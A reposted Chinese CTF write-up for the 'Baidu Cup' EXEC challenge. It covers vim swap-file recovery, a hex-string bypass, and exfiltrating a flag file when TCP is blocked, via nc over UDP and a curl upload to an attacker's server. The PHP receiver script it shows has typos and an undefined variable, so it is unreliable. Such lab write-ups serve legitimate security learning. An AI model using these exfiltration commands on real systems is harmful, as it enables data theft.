首页 > 其他 > 详细

“百度杯”CTF比赛 十月场EXEC

时间:2019-04-02 23:48:31      阅读:275      评论:0      收藏:0      [点我收藏+]

前面比较常规吧看源代码-看到vim 然后就是 .index.php.swp

然后就是 这个文件的恢复,用linux下vim -r index.php.swp  就可以看到不是乱码的文件了

然后就是审核源码

1.用了ord()[返回第一个的acsii编码] 函数 大概条件的条件就是 不能是数字 

2.用16进制的就可以绕过了 0xabcdef == ‘11259375‘ 条件为真

然后主要就是那个cmd的问题,不允许tcp链接

我在网上看到3种方法

1.用了一个python脚本进行sleep() 进行 类似sql盲注那种

2.用了一个nc 但是我没有成功 本机:nc -ulp 8888   远程:nc -u ip port < flag223.php   //这里就是一个反向输出

3.我用的是curl的方法

在服务端写了一个php脚本

<?php

$_FILES[‘wj‘][‘tmp_neme‘];

技术分享图片

move_uploaded_file($wj,123.txt);   //把上传的文件移动到123.txt

?>

然后在远程那边运行:curl http://123.com/1.php -F ‘wj=@flag233.php    //123.txt 

 

“百度杯”CTF比赛 十月场EXEC

原文:https://www.cnblogs.com/haozhizhi/p/10646144.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!